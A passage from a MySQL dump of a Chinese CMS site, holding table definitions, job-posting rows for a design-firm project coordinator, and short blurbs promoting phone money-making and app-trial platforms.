PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_zpmx_content`
-- -----------------------------
INSERT INTO `ey_zpmx_content` VALUES ('1', '9', '1621334422', '1621334422', '<p>1.负责项目客户文案整理;</p><p>2.负责协调项目时间进度安排,编写项目时间表,并安排设计师开展设计工作;</p><p>3.负责与客户电话、邮件沟通协调项目时间,并组织设计师进行设计方案提案;</p><p>4.能正确理解客户需求,向设计师转达客户设计要求或方案修改意见;</p><p><br/></p>', '<p>1.专科以上学历,有过项目跟踪经验,能熟练梳理文字整理,邮件收发、电话预约沟通等一系列工作;</p><p>2.能熟练操作office办公软件,并懂得制作等后期环节;</p><p>3.能适应多任务处理的工作压力;</p><p>4.工作积极,理解能力强,能主动思考,具有良好的沟通能力及团队协作精神;</p><p>5.有设计公司1-2年项目跟踪工作经验优先考虑;</p><p><br/></p>');
INSERT INTO `ey_zpmx_content` VALUES ('2', '10', '1621334444', '1621334444', '<p>1.负责项目客户文案整理;</p><p>2.负责协调项目时间进度安排,编写项目时间表,并安排设计师开展设计工作;</p><p>3.负责与客户电话、邮件沟通协调项目时间,并组织设计师进行设计方案提案;</p><p>4.能正确理解客户需求,向设计师转达客户设计要求或方案修改意见;</p><p><br/></p>', '<p>1.专科以上学历,有过项目跟踪经验,能熟练梳理文字整理,邮件收发、电话预约沟通等一系列工作;</p><p>2.能熟练操作office办公软件,并懂得制作等后期环节;</p><p>3.能适应多任务处理的工作压力;</p><p>4.工作积极,理解能力强,能主动思考,具有良好的沟通能力及团队协作精神;</p><p>5.有设计公司1-2年项目跟踪工作经验优先考虑;</p><p><br/></p>');
INSERT INTO `ey_zpmx_content` VALUES ('3', '11', '1621334461', '1621334461', '<p>1.专科以上学历,有过项目跟踪经验,能熟练梳理文字整理,邮件收发、电话预约沟通等一系列工作;</p><p>2.能熟练操作office办公软件,并懂得制作等后期环节;</p><p>3.能适应多任务处理的工作压力;</p><p>4.工作积极,理解能力强,能主动思考,具有良好的沟通能力及团队协作精神;</p><p>5.有设计公司1-2年项目跟踪工作经验优先考虑;</p><p><br/></p>', '<p>1.负责项目客户文案整理;</p><p>2.负责协调项目时间进度安排,编写项目时间表,并安排设计师开展设计工作;</p><p>3.负责与客户电话、邮件沟通协调项目时间,并组织设计师进行设计方案提案;</p><p>4.能正确理解客户需求,向设计师转达客户设计要求或方案修改意见;</p><p><br/></p>');
-- -----------------------------
-- Table structure for `ey_zt_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_zt_content`;
CREATE TABLE `ey_zt_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`daodu` text COMMENT '导读',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_zt_content`
-- -----------------------------
INSERT INTO `ey_zt_content` VALUES ('1', '122', '1641347764', '1641347764', '这里汇总了本站所有悬赏任务兼职平台,方便大家按需要下载或了解这些悬赏任务接单平台。');
INSERT INTO `ey_zt_content` VALUES ('2', '123', '1641347764', '1641347764', '苹果手机最新ios试玩平台赚钱软件汇总\r\n查看苹果手机最新ios试玩平台赚钱软件汇总详情');
INSERT INTO `ey_zt_content` VALUES ('3', '124', '1641347764', '1641347764', '本专题精选了应用试客、巨宝朋、体验达人、欢乐试玩等微信赚钱公众号平台。');
INSERT INTO `ey_zt_content` VALUES ('4', '125', '1641347764', '1641347764', '这里汇总下手机转发、分享和阅读赚钱的手机赚钱应用或微信公众号,包括转发分享文章赚钱和转发分享广告活动信息的微信公众号和赚钱应用。');
INSERT INTO `ey_zt_content` VALUES ('5', '126', '1641347764', '1641347764', '精选1元提现、实时到账的平台。');
INSERT INTO `ey_zt_content` VALUES ('6', '127', '1641347764', '1641347764', '精选新锐苹果应用试玩手赚平台');
INSERT INTO `ey_zt_content` VALUES ('7', '128', '1641347764', '1641347764', '苹果iOS系统赚钱软件精彩推荐');
INSERT INTO `ey_zt_content` VALUES ('8', '129', '1641347764', '1641347764', '精品手机看广告、看资讯和转发文章等赚钱APP汇总');